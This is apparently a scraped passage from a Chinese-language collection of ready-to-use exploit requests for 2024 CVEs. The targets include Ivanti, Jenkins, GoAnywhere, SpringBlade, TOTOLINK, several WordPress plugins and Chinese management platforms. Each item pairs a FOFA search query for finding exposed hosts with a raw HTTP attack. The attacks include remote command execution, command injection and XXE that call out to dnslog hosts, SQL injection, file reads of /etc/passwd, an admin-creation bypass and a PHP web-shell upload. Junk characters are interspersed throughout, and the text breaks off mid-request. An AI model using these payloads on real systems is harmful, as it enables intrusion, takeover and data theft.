Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 m# h& C+ w3 |! q9 L& ?
Content-Type: application/x-www-form-urlencoded; charset=UTF-89 j1 ^+ b' V! I6 c& V5 Z0 k$ x( ^
X-Requested-With: XMLHttpRequest
" L) O, U7 o4 l$ n6 ` W+ o2 n- U! ^7 x. G3 ^% D5 ^ _. G
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
9 A; \; H7 {) m$ n4 Z1 x& I) S9 }7 F p
/ e5 |$ h$ V1 r2 `" \/ H
99. Ncast盈可视高清智能录播系统busiFacade RCE
4 U7 e$ A/ ^: q0 S& {1 W# ?' s% ICVE-2024-0305- t; O5 ?% U+ R; C$ }) n- ?- u. S
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
3 \' @% |" a5 LPOST /classes/common/busiFacade.php HTTP/1.10 b% f: d: u C. d
Host: 192.168.40.130:8080
) l1 [0 K5 ^5 I+ I! YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
u g3 C2 R2 p: H( G! c. MConnection: close) X* y5 s' v4 G7 P2 U
Content-Length: 154
' p9 a9 G8 Q+ sAccept: */*9 Y+ x, S8 B4 i$ I- k* N
Accept-Encoding: gzip, deflate
& f/ K% c, r2 H; ]' g+ x9 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 g# x3 k: j& ~- t( |1 W! T7 Y3 z% `
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" J; m0 Z h; k" u/ P# zX-Requested-With: XMLHttpRequest( Q( G8 Z, n5 e
5 v5 @. z" C$ L. C9 x" }; l3 p7 `
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* e; j* k7 ^2 H) k8 W
" M4 n' p: B& v" `6 ]2 o
" B4 `0 ~1 ]% b+ ~& N' F/ f100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
h2 e' k9 _# J$ {9 W ECVE-2024-0352- `. D: ?1 Z- j- T N
FOFA:icon_hash="874152924"- H4 T2 |0 b' T9 q1 H1 n8 m" M
POST /api/file/formimage HTTP/1.1
' @- ?* ?: {0 x, y0 c! AHost: 192.168.40.1307 g& B* x N! J+ l1 x2 N7 ^: x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
" b# F. g0 m' N2 s( Z( e: c* x* UConnection: close$ F3 E4 l/ K( P' _- f7 s/ X
Content-Length: 201
: a6 |( h# n4 y- G0 p$ e' vContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
9 {6 c0 @/ V$ E2 UAccept-Encoding: gzip: k% g; b9 ]5 C/ l- [
& ?" z5 E) s$ P------WebKitFormBoundarygcflwtei
0 P- r% \8 r3 f5 I6 c4 ]" dContent-Disposition: form-data; name="file";filename="IE4MGP.php"5 G4 z0 k6 ^4 d7 h8 U
Content-Type: application/x-php7 U' T" L7 Q) Q& y: e
5 e* ?2 r1 I" A& A: i' v5 s7 B% b2ayyhRXiAsKXL8olvF5s4qqyI2O7 y M8 V& [0 i9 c* o3 `: j8 L5 Z
------WebKitFormBoundarygcflwtei--2 e" ?* G% k% K" R6 e4 [3 ^
7 ^7 K- y/ C- M! t8 ?( C
; G6 o# L' V N/ A3 g% A( G) \101. ivanti policy secure-22.6命令注入9 V) t7 Z0 w. D2 ~' o9 p" I6 T
CVE-2024-218872 X: b! H, K3 u3 T0 }3 B
FOFA:body="welcome.cgi?p=logo"
8 A) E* S( r6 d# _: KGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1: m; P. U5 M1 v6 w1 e
Host: x.x.x.xx.x.x.x+ z- {' A: P" m* e5 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# u- b0 ~& g* C: y7 ?6 o' VConnection: close
8 w. k# x, \( ^- `- BAccept-Encoding: gzip
( ?9 Y6 p) ^3 m- R5 X
: e* F/ {$ @: T+ N2 D- M$ m3 N) _8 Z+ B/ H$ N) ?$ a4 E
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行% f% }7 ?& r" Y+ z0 f1 J
CVE-2024-218935 A( P9 z' ]" _! g0 p4 k; ^
FOFA:body="welcome.cgi?p=logo"3 g& ]+ U, K# R# K2 X
POST /dana-ws/saml20.ws HTTP/1.19 K& N. X7 w9 \9 g
Host: x.x.x.x
( l. ^7 @9 u. K& ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 ^4 A3 \" V4 E( F# B
Connection: close7 a- S9 e) d! ^0 W0 g
Content-Length: 792
7 H3 o1 j- N* u4 j: g/ e+ U8 WAccept-Encoding: gzip
' f( M! J0 P3 B* n& i/ q+ \% j( V; A! F- y: \& H
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>1 j3 Y, b: Z) O6 y$ p6 z
# w/ R( Q0 u- C0 O4 C1 W
103. Ivanti Pulse Connect Secure VPN XXE
+ Q( R% b$ q; UCVE-2024-22024$ ?/ _. T* i- V: d3 Q( A! K; [
FOFA:body="welcome.cgi?p=logo"
0 j8 n; i0 @3 O- {2 R) y9 pPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
. k7 I# V" o2 R* ?$ eHost: 192.168.40.130:1110 {/ N: ~3 ~: h& e3 ^1 R7 s
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 E# Z9 v# L* c) Y W1 J4 qConnection: close
9 |2 n7 e: y! ^' x5 G& `4 EContent-Length: 204$ ~$ @9 r" _' G8 B* o4 z8 q5 [
Content-Type: application/x-www-form-urlencoded
; {4 X& t! n A/ `Accept-Encoding: gzip
# M) k$ ?$ {& P( n8 S5 `3 O* V* W" j0 o7 ]
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==& k+ q9 m! F% A9 t; \- r
8 K: F7 M& f* W% v3 @0 z$ L" t
& a( p* Q4 c0 P
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
0 n1 e' U Z5 J. \. _6 B/ l8 @<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>. b7 N5 }8 X/ ^. G' w
% U2 K. f( D5 l. H$ [
! h* D$ F5 d; W6 r& Z0 L4 v104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露3 r% F1 ~* V) I5 `+ J+ F( r
CVE-2024-0569
& ^4 ]2 Z8 ^( p, S# C' pFOFA:title="TOTOLINK"
! d! L( u V: F: h* r- O+ cPOST /cgi-bin/cstecgi.cgi HTTP/1.13 ~$ |" ?/ t2 T0 i {5 d2 `
Host:192.168.0.1
% d. Y ^ `" `+ J4 K8 p$ s3 FContent-Length:41
5 n# J6 R( h# B/ hAccept:application/json,text/javascript,*/*;q=0.01
/ q0 W- I$ D* vX-Requested-with: XMLHttpRequest
0 b* M2 ?9 h1 z4 Y' ^User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
0 h# k, I& ^6 ?/ b1 Y& \Content-Type: application/x-www-form-urlencoded:charset=UTF-8
! }/ L$ e, O& G7 B9 z }5 l9 B# WOrigin: http://192.168.0.1$ | @3 s4 j: v# l: z
Referer: http://192.168.0.1/advance/index.html?time=16711523805646 D) U" R) Y* K
Accept-Encoding:gzip,deflate
% P. p2 {% q4 l+ D5 Z2 D8 LAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 `7 U: ?1 _6 e9 a- n6 e. H; C2 RConnection:close
9 t: _1 z( F, w9 I8 L
4 h3 _" V/ N$ k9 X4 g# h{
_0 a* d: j @7 v0 Z0 `5 z3 B- F"topicurl":"getSysStatusCfg",
$ R0 K5 P* B1 n6 L/ v/ g E"token":""
4 N( H# t, }# Q' s}# C2 Z0 i, `; T6 y T: T5 l
{& b$ f' o- \
105. SpringBlade v3.2.0 export-user SQL 注入( o! x, a6 L* K1 t
FOFA:body="https://bladex.vip"
# V8 H, V# i4 G; t" Qhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
! Z( d& M2 @6 Y& B4 `* i) N# z! v& v" F, |/ A, r- p5 c1 B( M
106. SpringBlade dict-biz/list SQL 注入0 Z6 ]; B+ i0 ?' g$ C
FOFA:body="Saber 将不能正常工作"
3 q" _ R7 k1 Z l6 mGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
5 i; ?% r8 I1 N2 sHost: your-ip4 U9 k$ _9 X1 V8 B! T/ w) M9 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' B: ~% R- M+ k$ mBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
9 i- K0 p2 t- f7 XAccept-Encoding: gzip, deflate
4 o6 E' j* o' @/ p+ s7 v- _ C& iAccept-Language: zh-CN,zh;q=0.9
1 C3 V+ v% t. Z/ yConnection: close
& x, h! u7 i; l7 o% O5 B4 _
# e1 I$ m6 A8 c; _" j2 [
& c' ^3 e m: }8 M107. SpringBlade tenant/list SQL 注入
& L9 H( O# @/ w) L/ J- RFOFA:body="https://bladex.vip"
0 F0 F4 M$ p' g# TGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.18 _+ }+ h8 e( P6 N# e
Host: your-ip$ d, h% T& h+ B/ ^( @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
t( W. R0 C/ ABlade-Auth:替换为自己的
/ U& r6 Y3 \" @ K/ r0 n( W* X OConnection: close
n, Z0 P% U. v( O
0 ^7 e6 q3 P% r) F; }: ]4 L! z% x3 [3 P% `
108. D-Tale 3.9.0 SSRF
0 \9 D5 r/ r" g) B/ eCVE-2024-21642
0 P2 ~3 |5 w# b& JFOFA:"dtale/static/images/favicon.png"! Q) X5 v: `4 e: ?8 u
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
' f) h) m: ^) k' S. RHost: your-ip( @3 M7 x) ] g; K! j
Accept: application/json, text/plain, */*
. U- _8 s! Q% v. X; G m6 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. g5 [* ]; |6 t, ^
Accept-Encoding: gzip, deflate+ K3 c7 ~5 ~- N5 V ^- J- T
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' @. x2 M. x# {0 g5 q' Q
Connection: close
4 p I, Y* ?3 Y7 x* J# k" k
2 C% c# [. u6 r- y" K# U6 p6 s; a3 @( s
109. Jenkins CLI 任意文件读取. S% x% M0 h" U `. p1 \( P: p8 t
CVE-2024-238974 c+ d" Y" H* I7 K* y
FOFA:header="X-Jenkins"
7 _* V- o. d4 {: I' ~0 L# x' [POST /cli?remoting=false HTTP/1.1) P: e3 q: X& ?. N+ @ }
Host:
9 Y$ c: w; H# K6 s' O2 iContent-type: application/octet-stream
( z& i7 }" u3 J) q$ tSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e926 c( B x- T; r4 r# T' S% y4 E
Side: upload8 Q) `. @& q% `8 ^/ \
Connection: keep-alive6 b6 k* p6 C, v
Content-Length: 163" Z) t" h' P- `; A. r! X
9 f p6 Z4 {# c. q" _+ N* L
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
9 b! }2 b/ b+ d+ o/ L* _
7 i1 B: }! L! H* }% ~9 l! L H5 T! ?! e) p
POST /cli?remoting=false HTTP/1.1
7 T- T# k2 D, y) Z' [) i. }0 cHost:. J% J& E# u3 Q6 C; d
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& V5 Q' j# P$ W2 d1 D6 N; N, V5 \download, Q; e2 ]" I1 l6 ?; H( B8 w
Content-Type: application/x-www-form-urlencoded q) y1 ]* m2 y) C1 T
Content-Length: 0( ?5 D( W8 ~; ^5 D& M
: Z1 P3 k# i F6 B4 f& I
* T) G- ~3 Q1 U6 N: n& s, X
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
8 _3 n- v' N3 P9 [java -jar jenkins-cli.jar help
2 K) r& @! {6 t/ G- x[COMMAND]
, H% \5 Q5 _* _2 O* E# T1 DLists all the available commands or a detailed description of single command.
% ~" y/ q5 l8 N* s COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)- y- o' d2 z' M+ h# v9 I
3 l1 j1 d2 W% Y0 i& ~
. I2 l/ ]! M: k; A, P
110. Goanywhere MFT 未授权创建管理员
) _ {6 [* P: `0 X+ Q. n2 S9 Z9 |CVE-2024-0204/ u6 u$ T8 \* T L, f( K
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"% M8 R6 q8 l; Z& n5 v
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
7 L7 D1 @/ I; w( J8 AHost: 192.168.40.130:8000
+ P* [( _7 ^" L& u- DUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36: M" L( I, T( B: ]3 [! T; W
Connection: close# z9 b4 B( J/ s: T" j
Accept: */*
# X, _2 ~* L2 ^* b1 j3 N. ?& L7 X; ]8 ~Accept-Language: en% d; j, K8 A+ K* C" N3 }% Z
Accept-Encoding: gzip
; e+ I: M* h* g- k9 j! l6 j& i% B
. Y( a2 ^& q5 D! ^8 D. Y2 U0 ~
" x: m$ l) S( r3 k4 U111. WordPress Plugin HTML5 Video Player SQL注入
, N. R$ W8 |; r0 SCVE-2024-10613 H g+ K& G- `7 T" a% ~
FOFA:"wordpress" && body="html5-video-player"# v3 S+ q5 ?$ h9 }3 K& I: z
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.19 x8 O5 r" Y5 s5 U7 x
Host: 192.168.40.130:112
4 _5 W% k7 Q; \ AUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 y( X. v5 \. V0 V
Connection: close" }" y: d- X5 t1 `# s% l4 n
Accept: */*
* R4 O7 O7 U- R+ j8 EAccept-Language: en
& l% `0 `, ?/ C0 D& ?) I: nAccept-Encoding: gzip5 T' e; J5 L9 z0 o
8 }) g9 C8 X5 n; e: T* z1 [3 c1 h: D1 q1 T
112. WordPress Plugin NotificationX SQL 注入3 w' i7 B* h" A
CVE-2024-1698
+ o6 j/ W: ^) m; Y" A3 dFOFA:body="/wp-content/plugins/notificationx"
. S0 b8 i+ ]8 R% @/ w1 Q6 S- a- APOST /wp-json/notificationx/v1/analytics HTTP/1.18 X6 x- }' Q l9 t
Host: {{Hostname}}, E1 L# e/ m1 [5 h/ `6 k
Content-Type: application/json& @+ l- e2 E+ W* m+ r8 i: I
2 R. s) q) b: X0 ]6 F{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
! C' h9 }- {: |9 V& ]: p! F/ ~9 I' q3 q. T& V
4 T& {3 h4 L; ^$ q1 {. z1 X* R) R1 P113. WordPress Automatic 插件任意文件下载和SSRF6 m) c) }- y( U, D9 F! v" p
CVE-2024-27954& g0 t- y7 }3 `8 ]( P! ]$ M6 v/ G
FOFA:"/wp-content/plugins/wp-automatic"0 O. n( P& u5 ]! R/ _
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
' `: T% B% M, ]7 aHost: x.x.x.x1 i9 b3 O. B' w
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.364 ]' F: L7 K( E, u9 c
Connection: close* B) j9 @7 O2 Y+ {1 E8 S Z
Accept: */*5 B, x& \$ G# h5 `* u
Accept-Language: en9 ~2 o+ }+ I! d' f3 Y+ Y& J5 v
Accept-Encoding: gzip7 M0 i- j1 d& t7 b
4 d5 Z5 s+ _! q9 [* ?8 D6 Y9 ~- K* X
& k1 Z& [3 l" v6 ^* {8 q' i& k# T114. WordPress MasterStudy LMS插件 SQL注入$ T: `4 a5 X/ y
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"$ F& x; g$ a2 S$ w3 ^3 G: i7 J
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
; F8 u& q% H. `$ U4 C+ b: x2 ]Host: your-ip1 v; S. `$ R1 g: ]
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36* s- m! }2 S- F+ u0 r; a- B k+ L
Accept-Charset: utf-8
& e0 d3 u5 F/ Y% j2 \5 q }' ~' EAccept-Encoding: gzip, deflate2 T6 }: v8 d- Z
Connection: close' N2 e1 X9 b/ ?% P2 v2 g2 o0 J* J3 _
1 H/ h @ t7 I# a3 `5 X
# o |, k4 s4 p115. WordPress Bricks Builder <= 1.9.6 RCE2 U3 M- G6 O5 T7 b1 E& W
CVE-2024-25600
' g- ^/ k7 z. f, }6 I; [' SFOFA: body="/wp-content/themes/bricks/"0 q: C# `# Q! k5 s6 w9 ^
第一步,获取网站的nonce值- \; A9 X+ u2 A2 v6 n
GET / HTTP/1.1
) N8 R k7 j/ b3 cHost: x.x.x.x
1 u, D# X; g1 h/ Q/ z5 EUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& e4 i$ s/ [1 J" b/ y; u7 w
Connection: close
1 w" }8 c' I6 t( q+ P/ F' N0 X% gAccept-Encoding: gzip
; m: k' x$ u& o
( l0 e& j4 b0 D9 d
; H1 x; s, x5 O& h: A$ u7 K第二步替换nonce值,执行命令 e: V& r" v6 Y& D) u5 v2 ^
POST /wp-json/bricks/v1/render_element HTTP/1.10 ~, ^8 b: c P# g! h3 ^5 l
Host: x.x.x.x
$ r o7 B7 m* n: @5 J9 F3 T0 J) eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 X/ U0 J& e& u* y1 Q0 P8 K& aConnection: close
( q9 T4 [; S+ A' a$ cContent-Length: 356# t1 d9 v+ t, E' ?1 ]5 H ^
Content-Type: application/json
0 j9 Q; t! O' m! v* k, H( wAccept-Encoding: gzip
$ Y' l5 b) B, ?$ D) B2 h# g+ k
- m1 x3 O j2 C8 p& k8 L{
, v! n" k5 k0 x; W0 H, G5 y% ~"postId": "1",- E# E! j' ^2 n x. p* f6 r; x
"nonce": "第一步获得的值",
3 v( |" w2 r/ }- N. B "element": {) `8 A: j. ]1 Q
"name": "container",) ] E( b! G. l8 R9 [
"settings": {+ j7 g8 ]; M4 U% R
"hasLoop": "true",) L9 b' n2 Z& Z2 |6 j4 F+ l* T" p% ?
"query": {
) ~' E; G2 R( z2 J4 w) [+ p0 C; ]' }) @ "useQueryEditor": true,
~; L6 g6 K& [$ D$ Y "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
# }& {) U# l6 h7 a* M5 A "objectType": "post"
7 b$ o3 t* L# z( R" x- f }
3 I, S: C( T+ T e2 y4 V7 a& U$ T }
5 |5 F5 J5 Q7 ^; ~3 b0 b }9 }: l; J% n6 n5 O1 ?6 }
}
* E! |. d/ P/ q
. |* W3 P# F& J6 ?: v4 V8 |" J: J, I! ^
116. wordpress js-support-ticket文件上传
9 i9 c! Z. n0 pFOFA:body="wp-content/plugins/js-support-ticket"
5 |4 o$ a, o9 ^7 ` hPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.13 q- |$ L% P3 b+ a3 P
Host:
1 ]+ _' k* q3 XContent-Type: multipart/form-data; boundary=--------767099171
2 ^$ N* |$ T1 J. c4 H7 vUser-Agent: Mozilla/5.05 c* g5 S3 V0 Y+ M
; ~' n6 U( ?, B* D `4 e; b6 E7 z----------767099171. s2 p4 |% q4 w" a
Content-Disposition: form-data; name="action"
7 q; s/ K) K( P7 nconfiguration_saveconfiguration
- N6 k; w" P9 \% S1 c5 D----------767099171& [8 t- n) {: ?3 z4 _
Content-Disposition: form-data; name="form_request"
9 ]4 e0 L6 \2 Ojssupportticket6 E+ ]6 j- L2 f# _8 R y
----------767099171
" H$ N1 [* v' FContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"5 C+ p/ V5 `! b. A3 d. w/ {
Content-Type: image/png
4 u7 W- n4 h2 T+ J0 [, y" j7 g----------767099171--
( Z' I' ~ ]- z' G& p1 i$ D! r
( b6 T/ K+ z8 g6 c* ~# W/ Q7 q, U& z' N: M4 s# a/ }
117. WordPress LayerSlider插件SQL注入, [' @% j+ z; S% i! D$ `; C% f
version:7.9.11 – 7.10.0
: m( ~& X ~1 K2 t( F3 X& I8 u' xFOFA:body="/wp-content/plugins/LayerSlider/"
, y; ?+ ]0 G. V& H! GGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
% y' {: j; R3 ^Host: your-ip2 C1 X$ s( M- _. _3 {4 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0: K# v! s k# o# D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 X' J% n$ N/ d+ h1 c; rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# K8 ]# U# B/ K$ R9 s$ B
Accept-Encoding: gzip, deflate, br
9 e6 x) l* f$ U% h" U# R9 q JConnection: close
! l z( H+ z0 V/ `Upgrade-Insecure-Requests: 19 m5 b" s4 n/ F: L3 D# p3 p
6 v- Y. S- @) q' x
# x6 s# W; O) l3 n
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传; h$ d! |8 d$ N( p( c# s, I% H& o
CVE-2024-0939
4 ^, V, S/ t u$ tFOFA:title="Smart管理平台"
2 d3 a% [8 J7 v" n% |5 xPOST /Tool/uploadfile.php? HTTP/1.1
' d0 t5 a- r9 [7 W& e" zHost: 192.168.40.130:84433 D# N+ k% n5 g
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
- C) Q$ W I0 W) `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
, N1 j1 H) E8 l1 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 T- [$ U. K/ ^/ o1 u0 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 z) M& M+ L4 M p kAccept-Encoding: gzip, deflate
1 _3 ~* [0 R7 z, R8 VContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
% t1 I s% E4 A5 FContent-Length: 405
# l" Z1 ^4 D1 Z. u0 e& IOrigin: https://192.168.40.130:8443
& ^3 z7 a" }! E1 ?( XReferer: https://192.168.40.130:8443/Tool/uploadfile.php
# t2 a: r: z' o$ vUpgrade-Insecure-Requests: 1# P2 q2 T5 w: Q1 j
Sec-Fetch-Dest: document
# D4 V2 R0 N- Y1 U) L+ @) u$ |Sec-Fetch-Mode: navigate
" K4 C6 N) u3 N P3 j% JSec-Fetch-Site: same-origin$ ?' t* I- @! U, L x$ j+ H
Sec-Fetch-User: ?1
0 c k7 f9 I# f* UTe: trailers# s" e7 w* I* s' P+ w3 r" |$ V/ Y3 J6 i
Connection: close! R' T6 C9 M% R& R. t! t5 Y) I
1 I5 V, V: N$ E: s/ G-----------------------------13979701222747646634037182887: E+ z- x1 P+ v
Content-Disposition: form-data; name="file_upload"; filename="contents.php"4 _& Q- ~6 n% u* m$ R- t" t
Content-Type: application/octet-stream+ E+ l6 N6 g- U1 d: p
7 F2 Z' R" [: {% A( k, I- e7 c3 Q$ g
<?php7 G- r/ p3 ^4 L( N$ A; h
system($_POST["passwd"]);/ p2 ]( S" o w; o7 j5 e$ \$ a; y6 s
?>9 H+ A3 U' G( I5 q; _ l5 |
-----------------------------13979701222747646634037182887; i- S7 @, W) _0 E3 b9 p9 [
Content-Disposition: form-data; name="txt_path"
- e0 z+ P4 p/ X% j' ~
% `- F( V* }) D3 @1 I! V/home/src.php
5 R* p- u; S) P, n% q# W# U1 \6 P-----------------------------13979701222747646634037182887--, R& R8 L. n9 X4 H8 M/ p
/ O/ b% H! R& d( K7 s
6 G0 p8 \$ }' H9 y
访问/home/src.php4 ~7 u- b- X) s# z' N
& o, x; m# [8 e- C/ Q$ o
119. 北京百绰智能S20后台sysmanageajax.php sql注入7 @ u. H6 g& e% S
CVE-2024-1254
$ f1 U$ T: F* i+ EFOFA:title="Smart管理平台"" w9 z s `4 M9 z0 ^7 s' X
先登录进入系统,默认账号密码为admin/admin
6 V" N' @0 _/ K; ~8 q5 PPOST /sysmanage/sysmanageajax.php HTTP/1.11
& R$ }4 e7 X; o7 aHost: x.x.x.x/ Z! O% |3 x- `, A, V7 H6 G
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
0 k( Z( \, m+ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
* |) |# [. _# b KAccept: */*3 F6 p# X2 m6 c3 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 ], O9 @4 t! l8 G- sAccept-Encoding: gzip, deflate$ Y8 H* C% {- N$ I: o7 ~
Content-Type: application/x-www-form-urlencoded;
3 g% {' \4 z% z3 E0 W$ PContent-Length: 109
7 Z( H: i4 t2 DOrigin: https://58.18.133.60:8443
! ]- N5 q% I1 e( I BReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
1 i! g" ~2 N2 X( D0 u3 {Sec-Fetch-Dest: empty
8 j0 D( @" i7 P7 PSec-Fetch-Mode: cors9 k7 D. E% G; L4 [
